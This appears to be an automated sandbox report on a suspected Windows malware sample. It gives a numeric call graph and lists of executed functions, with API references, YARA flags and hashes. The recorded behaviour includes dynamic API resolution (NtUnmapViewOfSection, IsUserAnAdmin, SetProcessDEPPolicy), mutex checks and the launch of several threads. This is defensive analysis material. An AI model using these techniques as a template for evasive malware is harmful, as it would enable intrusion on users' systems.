45959 40daf5 45957->45959 46244 412338 31 API calls 45958->46244 46255 439867 39 API calls _strftime 45959->46255 45962 40d942 ctype 45966 401e45 22 API calls 45962->45966 45964 40db02 45965 401e45 22 API calls 45964->45965 45967 40db0d 45965->45967 45968 40d959 45966->45968 45969 401e45 22 API calls 45967->45969 45968->45895 45970 401e45 22 API calls 45968->45970 45971 40db1e 45969->45971 45972 40d976 45970->45972 46256 408f1f 163 API calls _wcslen 45971->46256 46245 419bca 28 API calls 45972->46245 45975 40d982 46246 40de34 88 API calls 45975->46246 45976 40db33 45978 401e45 22 API calls 45976->45978 45980 40db3c 45978->45980 45979 40db83 45981 401e45 22 API calls 45979->45981 45980->45979 45982 43229f new 22 API calls 45980->45982 45987 40db91 45981->45987 45983 40db53 45982->45983 45984 401e45 22 API calls 45983->45984 45985 40db65 45984->45985 45990 40db6c CreateThread 45985->45990 45986 40dbd9 45989 401e45 22 API calls 45986->45989 45987->45986 45988 43229f new 22 API calls 45987->45988 45991 40dba5 45988->45991 45995 40dbe2 45989->45995 45990->45979 46522 417f6a 101 API calls 2 library calls 45990->46522 45992 401e45 22 API calls 45991->45992 45993 40dbb6 45992->45993 45998 40dbbd CreateThread 45993->45998 45994 40dc4c 45996 401e45 22 API calls 45994->45996 45995->45994 45997 401e45 22 API calls 45995->45997 46000 40dc55 45996->46000 45999 40dbfc 45997->45999 45998->45986 46525 417f6a 101 API calls 2 library calls 45998->46525 46002 401e45 22 API calls 45999->46002 46001 40dc99 46000->46001 46004 401e45 22 API calls 46000->46004 46262 4195f8 79 API calls 46001->46262 46005 40dc11 46002->46005 46007 40dc69 46004->46007 46257 40c5a1 31 API calls 46005->46257 46006 40dca2 46263 401ef3 28 API calls 46006->46263 46012 401e45 22 API calls 46007->46012 46009 40dcad 46264 401ee9 11 API calls 46009->46264 46015 40dc7e 46012->46015 46013 40dc24 46258 401ef3 28 API calls 46013->46258 46014 40dcb6 CreateThread 46019 40dce5 46014->46019 46020 40dcd9 CreateThread 46014->46020 46519 40e18d 121 API calls 46014->46519 46260 439867 39 API calls _strftime 46015->46260 46018 40dc30 46259 401ee9 11 API calls 46018->46259 46019->45872 46022 40dcee CreateThread 46019->46022 46020->46019 46520 410b5c 137 API calls 46020->46520 46022->45872 46523 411140 38 API calls ___scrt_fastfail 46022->46523 46024 40dc39 CreateThread 46024->45994 46524 401bc9 49 API calls _strftime 46024->46524 46025 40dc8b 46261 40b0a3 7 API calls 46025->46261 46028 432739 46027->46028 46028->45763 46029 44091f 46028->46029 46527 44069c 46029->46527 46032->45745 46033->45749 46034->45754 46035->45759 46036->45765 46037->45751 46038->45771 46039->45773 46044 44cd48 46040->46044 46043 436cfa 8 API calls 3 library calls 46043->45774 46047 44cd65 46044->46047 46048 44cd61 46044->46048 46046 432372 46046->45777 46046->46043 46047->46048 46050 4475a6 46047->46050 46062 432d4b 46048->46062 46051 4475b2 ___scrt_is_nonwritable_in_current_image 46050->46051 46069 442d9a EnterCriticalSection 46051->46069 46053 4475b9 46070 44d363 46053->46070 46055 4475c8 46056 4475d7 46055->46056 46081 44743a 23 API calls 46055->46081 46083 4475f3 LeaveCriticalSection std::_Lockit::~_Lockit 46056->46083 46059 4475d2 46082 4474f0 GetStdHandle GetFileType 46059->46082 46060 4475e8 ___scrt_is_nonwritable_in_current_image 46060->46047 46063 432d56 IsProcessorFeaturePresent 46062->46063 46064 432d54 46062->46064 46066 432d98 46063->46066 46064->46046 46105 432d5c SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 46066->46105 46068 432e7b 46068->46046 46069->46053 46071 44d36f ___scrt_is_nonwritable_in_current_image 46070->46071 46072 44d393 46071->46072 46073 44d37c 46071->46073 46084 442d9a EnterCriticalSection 46072->46084 46092 43ad91 20 API calls __dosmaperr 46073->46092 46076 44d3cb 46093 44d3f2 LeaveCriticalSection std::_Lockit::~_Lockit 46076->46093 46077 44d39f 46077->46076 46085 44d2b4 46077->46085 46079 44d381 ___scrt_is_nonwritable_in_current_image _strftime 46079->46055 46081->46059 46082->46056 46083->46060 46084->46077 46094 443005 46085->46094 46087 44d2c6 46091 44d2d3 46087->46091 46101 445fb3 11 API calls 2 library calls 46087->46101 46090 44d325 46090->46077 46102 443c92 20 API calls _free 46091->46102 46092->46079 46093->46079 46099 443012 ___crtLCMapStringA 46094->46099 46095 443052 46104 43ad91 20 API calls __dosmaperr 46095->46104 46096 44303d RtlAllocateHeap 46097 443050 46096->46097 46096->46099 46097->46087 46099->46095 46099->46096 46103 440480 7 API calls 2 library calls 46099->46103 46101->46087 46102->46090 46103->46099 46104->46097 46105->46068 46107 4328dc GetStartupInfoW 46106->46107 46107->45782 46109 44c24b 46108->46109 46110 44c242 46108->46110 46109->45785 46113 44c138 48 API calls 4 library calls 46110->46113 46112->45785 46113->46109 46115 41a919 LoadLibraryA GetProcAddress 46114->46115 46116 41a909 GetModuleHandleA GetProcAddress 46114->46116 46117 41a947 GetModuleHandleA GetProcAddress 46115->46117 46118 41a937 GetModuleHandleA GetProcAddress 46115->46118 46116->46115 46119 41a973 24 API calls 46117->46119 46120 41a95f GetModuleHandleA GetProcAddress 46117->46120 46118->46117 46119->45790 46120->46119 46270 419493 FindResourceA 46121->46270 46124 439adb _Yarn 21 API calls 46125 40ddad _Yarn 46124->46125 46273 402097 46125->46273 46128 401fc2 28 API calls 46129 40ddd3 46128->46129 46130 401fb8 11 API calls 46129->46130 46131 40dddc 46130->46131 46132 439adb _Yarn 21 API calls 46131->46132 46133 40dded _Yarn 46132->46133 46279 4062ee 46133->46279 46135 40de20 46135->45792 46137 4020ec 46136->46137 46138 4023ae 11 API calls 46137->46138 46139 402106 46138->46139 46140 402549 28 API calls 46139->46140 46141 402114 46140->46141 46141->45795 46314 4020bf 46142->46314 46144 419d9a 46148 419e0c 46144->46148 46156 401fc2 28 API calls 46144->46156 46158 401fb8 11 API calls 46144->46158 46163 419e0a 46144->46163 46318 404182 28 API calls 46144->46318 46319 41ab9a 46144->46319 46145 401fb8 11 API calls 46146 419e3c 46145->46146 46147 401fb8 11 API calls 46146->46147 46149 419e44 46147->46149 46330 404182 28 API calls 46148->46330 46152 401fb8 11 API calls 46149->46152 46154 40d43c 46152->46154 46153 419e18 46155 401fc2 28 API calls 46153->46155 46164 40e563 46154->46164 46157 419e21 46155->46157 46156->46144 46159 401fb8 11 API calls 46157->46159 46158->46144 46160 419e29 46159->46160 46161 41ab9a 28 API calls 46160->46161 46161->46163 46163->46145 46165 40e56f 46164->46165 46167 40e576 46164->46167 46356 402143 11 API calls 46165->46356 46167->45800 46169 402143 46168->46169 46173 40217f 46169->46173 46357 402710 11 API calls 46169->46357 46171 402164 46358 4026f2 11 API calls std::_Deallocate 46171->46358 46173->45802 46175 40e624 46174->46175 46359 40f57c 46175->46359 46181 40d473 46184 401e45 46181->46184 46182 40e663 46182->46181 46375 40f663 46182->46375 46185 401e4d 46184->46185 46186 401e55 46185->46186 46470 402138 22 API calls 46185->46470 46186->45810 46190 40f997 __EH_prolog 46189->46190 46471 40fcfb 46190->46471 46192 40f663 36 API calls 46193 40fb90 46192->46193 46475 40fce0 46193->46475 46195 40d491 46197 40e5ba 46195->46197 46196 40fa1a 46196->46192 46481 40f4c6 46197->46481 46200 40d49a 46202 40dd70 46200->46202 46201 40f663 36 API calls 46201->46200 46491 40e5da 70 API calls 46202->46491 46204 40dd7b 46206 4020bf 11 API calls 46205->46206 46207 40530a 46206->46207 46492 403280 46207->46492 46209 405326 46209->45815 46497 4051cf 46210->46497 46212 408217 46501 402035 46212->46501 46215 401fc2 46216 401fd1 46215->46216 46217 402019 46215->46217 46218 4023ae 11 API calls 46216->46218 46224 401fb8 46217->46224 46219 401fda 46218->46219 46220 40201c 46219->46220 46221 401ff5 46219->46221 46222 40265a 11 API calls 46220->46222 46516 403078 28 API calls 46221->46516 46222->46217 46225 4023ae 11 API calls 46224->46225 46226 401fc1 46225->46226 46226->45829 46228 401fb2 46227->46228 46229 401fa9 46227->46229 46228->45834 46517 4025c0 28 API calls 46229->46517 46231->45842 46232->45862 46233->45873 46234->45845 46235->45863 46236->45865 46237->45891 46238->45865 46239->45876 46240->45950 46241->45953 46242->45918 46243->45958 46244->45962 46245->45975 46246->45852 46247->45895 46248->45909 46249->45913 46250->45920 46251->45926 46252->45927 46253->45931 46254->45935 46255->45964 46256->45976 46257->46013 46258->46018 46259->46024 46260->46025 46261->46001 46262->46006 46263->46009 46264->46014 46265->45870 46267->45883 46518 418ccd 103 API calls 46269->46518 46271 4194b0 LoadResource LockResource SizeofResource 46270->46271 46272 40dd9e 46270->46272 46271->46272 46272->46124 46274 40209f 46273->46274 46282 4023ae 46274->46282 46276 4020aa 46286 4024ea 46276->46286 46278 4020b9 46278->46128 46280 402097 28 API calls 46279->46280 46281 406302 46280->46281 46281->46135 46283 402408 46282->46283 46284 4023b8 46282->46284 46283->46276 46284->46283 46293 402787 11 API calls std::_Deallocate 46284->46293 46287 4024fa 46286->46287 46288 402500 46287->46288 46289 402515 46287->46289 46294 402549 46288->46294 46304 4028c8 28 API calls 46289->46304 46292 402513 46292->46278 46293->46283 46305 402868 46294->46305 46296 40255d 46297 402572 46296->46297 46298 402587 46296->46298 46310 402a14 22 API calls 46297->46310 46312 4028c8 28 API calls 46298->46312 46301 40257b 46311 4029ba 22 API calls 46301->46311 46303 402585 46303->46292 46304->46292 46306 402870 46305->46306 46307 402878 46306->46307 46313 402c83 22 API calls 46306->46313 46307->46296 46310->46301 46311->46303 46312->46303 46315 4020c7 46314->46315 46316 4023ae 11 API calls 46315->46316 46317 4020d2 46316->46317 46317->46144 46318->46144 46320 41aba7 46319->46320 46321 41ac06 46320->46321 46325 41abb7 46320->46325 46322 41ac20 46321->46322 46323 41ad46 28 API calls 46321->46323 46340 41aec3 28 API calls 46322->46340 46323->46322 46326 41abef 46325->46326 46331 41ad46 46325->46331 46339 41aec3 28 API calls 46326->46339 46327 41ac02 46327->46144 46330->46153 46333 41ad4e 46331->46333 46332 41ad80 46332->46326 46333->46332 46334 41ad84 46333->46334 46337 41ad68 46333->46337 46351 402705 22 API calls 46334->46351 46341 41adb7 46337->46341 46339->46327 46340->46327 46342 41adc1 __EH_prolog 46341->46342 46352 4026f7 22 API calls 46342->46352 46344 41add4 46353 41aeda 11 API calls 46344->46353 46346 41ae32 46346->46332 46347 41adfa 46347->46346 46354 402710 11 API calls 46347->46354 46349 41ae19 46355 4026f2 11 API calls std::_Deallocate 46349->46355 46352->46344 46353->46347 46354->46349 46355->46346 46356->46167 46357->46171 46358->46173 46379 40f821 46359->46379 46362 40f55d 46457 40f7fb 46362->46457 46364 40f565 46462 40f44c 46364->46462 46366 40e651 46367 40f502 46366->46367 46368 40f510 46367->46368 46369 40f53f std::ios_base::_Ios_base_dtor 46367->46369 46467 4335cb 65 API calls 46368->46467 46369->46182 46371 40f51d 46371->46369 46372 40f44c 20 API calls 46371->46372 46373 40f52e 46372->46373 46468 40fbc8 77 API calls 6 library calls 46373->46468 46376 40f66b 46375->46376 46377 40f67e 46375->46377 46469 40f854 36 API calls 46376->46469 46377->46181 46386 40d2ce 46379->46386 46383 40f83c 46384 40e631 46383->46384 46385 40f663 36 API calls 46383->46385 46384->46362 46385->46384 46387 40d2ff 46386->46387 46388 43229f new 22 API calls 46387->46388 46389 40d306 46388->46389 46396 40cb7a 46389->46396 46392 40f887 46393 40f896 46392->46393 46431 40f8b7 46393->46431 46395 40f89c std::ios_base::_Ios_base_dtor 46395->46383 46399 4332ea 46396->46399 46398 40cb84 46398->46392 46400 4332f6 __EH_prolog3 46399->46400 46411 4330a5 46400->46411 46404 433332 46417 4330fd 46404->46417 46406 433314 46425 43347f 37 API calls _Atexit 46406->46425 46408 43331c 46426 433240 21 API calls _Yarn 46408->46426 46409 433370 std::locale::_Init 46409->46398 46412 4330b4 46411->46412 46413 4330bb 46411->46413 46427 442df9 EnterCriticalSection std::_Lockit::_Lockit 46412->46427 46415 4330b9 46413->46415 46428 43393c EnterCriticalSection 46413->46428 46415->46404 46424 43345a 22 API calls 2 library calls 46415->46424 46418 433107 46417->46418 46419 442e02 46417->46419 46423 43311a 46418->46423 46429 43394a LeaveCriticalSection 46418->46429 46430 442de2 LeaveCriticalSection 46419->46430 46422 442e09 46422->46409 46423->46409 46424->46406 46425->46408 46426->46404 46427->46415 46428->46415 46429->46423 46430->46422 46432 4330a5 std::_Lockit::_Lockit 2 API calls 46431->46432 46433 40f8c9 46432->46433 46452 40cae9 4 API calls 2 library calls 46433->46452 46435 40f8dc 46445 40f8ef 46435->46445 46453 40ccd4 77 API calls new 46435->46453 46436 4330fd std::_Lockit::~_Lockit 2 API calls 46438 40f925 46436->46438 46438->46395 46439 40f8ff 46440 40f906 46439->46440 46441 40f92d 46439->46441 46454 4332b6 22 API calls new 46440->46454 46455 436ec6 RaiseException 46441->46455 46444 40f943 46446 40f984 46444->46446 46456 43219b EnterCriticalSection LeaveCriticalSection WaitForSingleObjectEx __Init_thread_wait 46444->46456 46445->46436 46446->46395 46452->46435 46453->46439 46454->46445 46455->46444 46458 43229f new 22 API calls 46457->46458 46459 40f80b 46458->46459 46460 40cb7a 41 API calls 46459->46460 46461 40f813 46460->46461 46461->46364 46463 40f469 46462->46463 46465 40f48b 46463->46465 46466 43aa1a 20 API calls 2 library calls 46463->46466 46465->46366 46466->46465 46467->46371 46468->46369 46469->46377 46473 40fd0e 46471->46473 46472 40fd3c 46472->46196 46473->46472 46479 40fe14 36 API calls 46473->46479 46476 40fce8 46475->46476 46478 40fcf3 46476->46478 46480 40fe79 36 API calls __EH_prolog 46476->46480 46478->46195 46479->46472 46480->46478 46482 40f4d4 46481->46482 46483 40f4d0 46481->46483 46489 40f30b 67 API calls 46482->46489 46486 40f44c 20 API calls 46483->46486 46485 40f4d9 46490 43a716 64 API calls 3 library calls 46485->46490 46488 40e5c5 46486->46488 46488->46200 46488->46201 46489->46485 46490->46483 46491->46204 46493 40328a 46492->46493 46495 4032a9 46493->46495 46496 4028c8 28 API calls 46493->46496 46495->46209 46496->46495 46498 4051db 46497->46498 46507 405254 46498->46507 46500 4051e8 46500->46212 46502 402041 46501->46502 46503 4023ae 11 API calls 46502->46503 46504 40205b 46503->46504 46512 40265a 46504->46512 46508 405262 46507->46508 46511 402884 22 API calls 46508->46511 46513 40266b 46512->46513 46514 4023ae 11 API calls 46513->46514 46515 40206d 46514->46515 46515->46215 46516->46217 46517->46228 46526 411253 61 API calls 46520->46526 46528 4406a8 FindHandlerForForeignException 46527->46528 46529 4406c0 46528->46529 46531 4407f6 _abort GetModuleHandleW 46528->46531 46549 442d9a EnterCriticalSection 46529->46549 46532 4406b4 46531->46532 46532->46529 46561 44083a GetModuleHandleExW 46532->46561 46536 4406c8 46545 44073d 46536->46545 46548 440766 46536->46548 46569 441450 20 API calls _abort 46536->46569 46537 440783 46553 4407b5 46537->46553 46538 4407af 46572 454909 5 API calls ___crtLCMapStringA 46538->46572 46547 440755 46545->46547 46570 441707 5 API calls ___crtLCMapStringA 46545->46570 46571 441707 5 API calls ___crtLCMapStringA 46547->46571 46550 4407a6 46548->46550 46549->46536 46573 442de2 LeaveCriticalSection 46550->46573 46552 44077f 46552->46537 46552->46538 46574 4461f8 46553->46574 46556 4407e3 46559 44083a _abort 8 API calls 46556->46559 46557 4407c3 GetPEB 46557->46556 46558 4407d3 GetCurrentProcess TerminateProcess 46557->46558 46558->46556 46560 4407eb ExitProcess 46559->46560 46562 440864 GetProcAddress 46561->46562 46563 440887 46561->46563 46566 440879 46562->46566 46564 440896 46563->46564 46565 44088d FreeLibrary 46563->46565 46567 432d4b ___crtLCMapStringA 5 API calls 46564->46567 46565->46564 46566->46563 46568 4408a0 46567->46568 46568->46529 46569->46545 46570->46547 46571->46548 46573->46552 46575 44621d 46574->46575 46579 446213 46574->46579 46580 4459f9 46575->46580 46577 432d4b ___crtLCMapStringA 5 API calls 46578 4407bf 46577->46578 46578->46556 46578->46557 46579->46577 46581 445a29 46580->46581 46585 445a25 46580->46585 46581->46579 46582 445a49 46582->46581 46584 445a55 GetProcAddress 46582->46584 46586 445a65 __crt_fast_encode_pointer 46584->46586 46585->46581 46585->46582 46587 445a95 46585->46587 46586->46581 46588 445ab6 LoadLibraryExW 46587->46588 46593 445aab 46587->46593 46589 445ad3 GetLastError 46588->46589 46590 445aeb 46588->46590 46589->46590 46591 445ade LoadLibraryExW 46589->46591 46592 445b02 FreeLibrary 46590->46592 46590->46593 46591->46590 46592->46593 46593->46585

            Executed Functions

            Function 0041A8DA Relevance: 105.1, APIs: 36, Strings: 24, Instructions: 130libraryloaderCOMMON
            Download Yara Rule

            Control-flow Graph

            APIs
            • LoadLibraryA.KERNELBASE(Psapi.dll,GetModuleFileNameExA,?,?,?,?,0040D40C), ref: 0041A8EF
            • GetProcAddress.KERNEL32(00000000), ref: 0041A8F8
            • GetModuleHandleA.KERNEL32(Kernel32.dll,GetModuleFileNameExA,?,?,?,?,0040D40C), ref: 0041A90F
            • GetProcAddress.KERNEL32(00000000), ref: 0041A912
            • LoadLibraryA.KERNEL32(Psapi.dll,GetModuleFileNameExW,?,?,?,?,0040D40C), ref: 0041A924
            • GetProcAddress.KERNEL32(00000000), ref: 0041A927
            • GetModuleHandleA.KERNEL32(Kernel32.dll,GetModuleFileNameExW,?,?,?,?,0040D40C), ref: 0041A93D
            • GetProcAddress.KERNEL32(00000000), ref: 0041A940
            • GetModuleHandleA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0040D40C), ref: 0041A951
            • GetProcAddress.KERNEL32(00000000), ref: 0041A954
            • GetModuleHandleA.KERNEL32(user32,SetProcessDpiAware,?,?,?,?,0040D40C), ref: 0041A969
            • GetProcAddress.KERNEL32(00000000), ref: 0041A96C
            • LoadLibraryA.KERNEL32(ntdll.dll,NtUnmapViewOfSection,?,?,?,?,0040D40C), ref: 0041A97D
            • GetProcAddress.KERNEL32(00000000), ref: 0041A980
            • LoadLibraryA.KERNEL32(kernel32.dll,GlobalMemoryStatusEx,?,?,?,?,0040D40C), ref: 0041A98C
            • GetProcAddress.KERNEL32(00000000), ref: 0041A98F
            • GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040D40C), ref: 0041A9A1
            • GetProcAddress.KERNEL32(00000000), ref: 0041A9A4
            • GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040D40C), ref: 0041A9B1
            • GetProcAddress.KERNEL32(00000000), ref: 0041A9B4
            • LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040D40C), ref: 0041A9C5
            • GetProcAddress.KERNEL32(00000000), ref: 0041A9C8
            • GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040D40C), ref: 0041A9D5
            • GetProcAddress.KERNEL32(00000000), ref: 0041A9D8
            • GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040D40C), ref: 0041A9EA
            • GetProcAddress.KERNEL32(00000000), ref: 0041A9ED
            • GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040D40C), ref: 0041A9FA
            • GetProcAddress.KERNEL32(00000000), ref: 0041A9FD
            • GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040D40C), ref: 0041AA0A
            • GetProcAddress.KERNEL32(00000000), ref: 0041AA0D
            • GetModuleHandleA.KERNEL32(kernel32.dll,GetSystemTimes,?,?,?,?,0040D40C), ref: 0041AA1F
            • GetProcAddress.KERNEL32(00000000), ref: 0041AA22
            • LoadLibraryA.KERNEL32(Shlwapi.dll,0000000C,?,?,?,?,0040D40C), ref: 0041AA30
            • GetProcAddress.KERNEL32(00000000), ref: 0041AA33
            • LoadLibraryA.KERNEL32(kernel32.dll,GetConsoleWindow,?,?,?,?,0040D40C), ref: 0041AA40
            • GetProcAddress.KERNEL32(00000000), ref: 0041AA43
            Strings
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID: AddressProc$HandleModule$LibraryLoad
            • String ID: EnumDisplayDevicesW$EnumDisplayMonitors$GetComputerNameExW$GetConsoleWindow$GetModuleFileNameExA$GetModuleFileNameExW$GetMonitorInfoW$GetSystemTimes$GlobalMemoryStatusEx$IsUserAnAdmin$IsWow64Process$Kernel32.dll$NtUnmapViewOfSection$Psapi.dll$SetProcessDEPPolicy$SetProcessDpiAware$SetProcessDpiAwareness$Shell32$Shlwapi.dll$kernel32$kernel32.dll$ntdll.dll$shcore$user32
            • API String ID: 551388010-2474455403
            • Opcode ID: e80cee8c84c8c84204283680f0404711a146afcd0be7a07adf6e8d3a182e926f
            • Instruction ID: 1e7ebd14e1f9a52016720e07cc743ec1e909bc11fdf6f09267ddb838bd68d733
            • Opcode Fuzzy Hash: e80cee8c84c8c84204283680f0404711a146afcd0be7a07adf6e8d3a182e926f
            • Instruction Fuzzy Hash: 9031EBF0E413587ADB207BBA5C09E5B3E9CDA80794711052BB408D3661FAFC9C448E6E
            Function 004407B5 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
            Download Yara Rule

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 450 4407b5-4407c1 call 4461f8 453 4407e3-4407ef call 44083a ExitProcess 450->453 454 4407c3-4407d1 GetPEB 450->454 454->453 455 4407d3-4407dd GetCurrentProcess TerminateProcess 454->455 455->453
            APIs
            • GetCurrentProcess.KERNEL32(00000000,?,0044078B,00000000,0046B4F8,0000000C,004408E2,00000000,00000002,00000000), ref: 004407D6
            • TerminateProcess.KERNEL32(00000000,?,0044078B,00000000,0046B4F8,0000000C,004408E2,00000000,00000002,00000000), ref: 004407DD
            • ExitProcess.KERNEL32 ref: 004407EF
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID: Process$CurrentExitTerminate
            • String ID:
            • API String ID: 1703294689-0
            • Opcode ID: ab47e799b5bc4cc6dde358da0dc0a23fd4678ab9e3bf0635ceb4545ab71368f2
            • Instruction ID: 8c86c1f28e0fd2f6406888839527a8aea1509f7e03a0ffdd8510570f14deced8
            • Opcode Fuzzy Hash: ab47e799b5bc4cc6dde358da0dc0a23fd4678ab9e3bf0635ceb4545ab71368f2
            • Instruction Fuzzy Hash: 9AE04631000608ABEF017F20DD48A493B29EB40346F410029F9088B232CB3DED52CA89
            Function 0040D3F0 Relevance: 69.0, APIs: 16, Strings: 23, Instructions: 774COMMON
            Download Yara Rule

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 7 40d3f0-40d45f call 41a8da call 40dd83 call 4020d6 * 2 call 419d87 call 40e563 call 401e6d call 43a300 24 40d461-40d4b5 call 40e609 call 401e45 call 401f8b call 40f98d call 40e5ba call 40dd70 call 401fb8 7->24 25 40d4b8-40d57f call 401e45 call 401f8b call 401e45 call 4052fe call 408209 call 401fc2 call 401fb8 * 2 call 401e45 call 401fa0 call 405a86 call 401e45 call 4051c3 call 401e45 call 4051c3 7->25 70 40d581-40d5c9 call 40822a call 401fc2 call 401fb8 call 401f8b call 411f34 25->70 71 40d5cf-40d5ea call 401e45 call 40fbab 25->71 70->71 105 40dd0f-40dd27 call 401f8b call 41239a call 410eda 70->105 80 40d656-40d679 call 401f8b CreateMutexA GetLastError 71->80 81 40d5ec-40d60d call 401e45 call 401f8b OpenMutexA 71->81 90 40d991-40d99a call 401fb8 80->90 91 40d67f-40d686 80->91 98 40d622-40d63f call 401f8b call 411f34 81->98 99 40d60f-40d61c WaitForSingleObject CloseHandle 81->99 110 40d9a1-40da01 call 434c30 call 40245c call 401f8b * 2 call 4120e8 call 408093 90->110 94 40d688 91->94 95 40d68a-40d6a7 GetModuleFileNameW call 4192ae 91->95 94->95 108 40d6b0-40d6b4 95->108 109 40d6a9-40d6ab 95->109 126 40d651 98->126 127 40d641-40d650 call 401f8b call 41239a 98->127 99->98 135 40dd2c 105->135 111 40d6b6-40d6c9 call 401e45 call 401f8b 108->111 112 40d717-40d72a call 401e45 call 401f8b 108->112 109->108 177 40da06-40da5f call 401e45 call 401f8b call 402073 call 401f8b call 41215f call 401e45 call 401f8b call 439867 110->177 111->112 140 40d6cb-40d6d1 111->140 142 40d731-40d7ad call 401e45 call 401f8b call 408093 call 401e45 call 401f8b call 401e45 call 401f8b call 401e45 call 401f8b call 401e45 call 401f8b 112->142 143 40d72c call 40e501 112->143 126->80 127->126 141 40dd31-40dd65 call 402073 call 4052dd call 402073 call 4194da call 401fb8 135->141 140->112 146 40d6d3-40d6d9 140->146 187 40dd6a-40dd6f call 413980 141->187 216 40d815-40d819 142->216 217 40d7af-40d7c8 call 401e45 call 401f8b call 439891 142->217 143->142 151 40d6f7-40d710 call 401f8b call 411eea 146->151 152 40d6db-40d6ee call 4060ea 146->152 151->112 175 40d712 call 4066a6 151->175 152->112 168 40d6f0-40d6f5 call 4067a0 152->168 168->112 175->112 221 40da61-40da63 177->221 222 40da65-40da67 177->222 216->110 220 40d81f-40d826 216->220 217->216 249 40d7ca-40d810 call 401e45 call 401f8b call 401e45 call 401f8b call 40c5ed call 401ef3 call 401ee9 217->249 224 40d8a7-40d8b1 call 408093 220->224 225 40d828-40d8a5 call 401e45 call 401f8b call 401e45 call 401f8b call 401e45 call 401f8b call 401e45 call 401f8b call 401e45 call 401f8b call 40b871 220->225 226 40da6b-40da7c call 41aa4f CreateThread 221->226 227 40da69 222->227 228 40da7e-40db48 call 402073 * 2 call 4194da call 401e45 call 401f8b call 401e45 call 401f8b call 401e45 call 401f8b call 401e45 call 401f8b call 439867 call 401e45 call 401f8b call 401e45 call 401f8b call 408f1f call 401e45 call 401f8b 222->228 235 40d8b6-40d8de call 40245c call 43254d 224->235 225->235 226->228 227->226 349 40db83-40db9a call 401e45 call 401f8b 228->349 350 40db4a-40db81 call 43229f call 401e45 call 401f8b CreateThread 228->350 256 40d8f0 235->256 257 40d8e0-40d8ee call 434c30 235->257 249->216 263 40d8f2-40d967 call 401ee4 call 43a796 call 40245c call 401f8b call 40245c call 401f8b call 412338 call 432556 call 401e45 call 40fbab 256->263 257->263 263->177 331 40d96d-40d98c call 401e45 call 419bca call 40de34 263->331 331->177 346 40d98e-40d990 331->346 346->90 359 40dbd9-40dbeb call 401e45 call 401f8b 349->359 360 40db9c-40dbd4 call 43229f call 401e45 call 401f8b CreateThread 349->360 350->349 371 40dc4c-40dc5e call 401e45 call 401f8b 359->371 372 40dbed-40dc47 call 401e45 call 401f8b call 401e45 call 401f8b call 40c5a1 call 401ef3 call 401ee9 CreateThread 359->372 360->359 383 40dc60-40dc94 call 401e45 call 401f8b call 401e45 call 401f8b call 439867 call 40b0a3 371->383 384 40dc99-40dcbf call 4195f8 call 401ef3 call 401ee9 371->384 372->371 383->384 404 40dcc1 384->404 405 40dcc4-40dcd7 CreateThread 384->405 404->405 408 40dce5-40dcec 405->408 409 40dcd9-40dce3 CreateThread 405->409 412 40dcfa-40dd01 408->412 413 40dcee-40dcf8 CreateThread 408->413 409->408 412->135 416 40dd03-40dd06 412->416 413->412 416->187 418 40dd08-40dd0d 416->418 418->141
            APIs
              • Part of subcall function 0041A8DA: LoadLibraryA.KERNELBASE(Psapi.dll,GetModuleFileNameExA,?,?,?,?,0040D40C), ref: 0041A8EF
              • Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A8F8
              • Part of subcall function 0041A8DA: GetModuleHandleA.KERNEL32(Kernel32.dll,GetModuleFileNameExA,?,?,?,?,0040D40C), ref: 0041A90F
              • Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A912
              • Part of subcall function 0041A8DA: LoadLibraryA.KERNEL32(Psapi.dll,GetModuleFileNameExW,?,?,?,?,0040D40C), ref: 0041A924
              • Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A927
              • Part of subcall function 0041A8DA: GetModuleHandleA.KERNEL32(Kernel32.dll,GetModuleFileNameExW,?,?,?,?,0040D40C), ref: 0041A93D
              • Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A940
              • Part of subcall function 0041A8DA: GetModuleHandleA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0040D40C), ref: 0041A951
              • Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A954
              • Part of subcall function 0041A8DA: GetModuleHandleA.KERNEL32(user32,SetProcessDpiAware,?,?,?,?,0040D40C), ref: 0041A969
              • Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A96C
              • Part of subcall function 0041A8DA: LoadLibraryA.KERNEL32(ntdll.dll,NtUnmapViewOfSection,?,?,?,?,0040D40C), ref: 0041A97D
              • Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A980
              • Part of subcall function 0041A8DA: LoadLibraryA.KERNEL32(kernel32.dll,GlobalMemoryStatusEx,?,?,?,?,0040D40C), ref: 0041A98C
              • Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A98F
              • Part of subcall function 0041A8DA: GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040D40C), ref: 0041A9A1
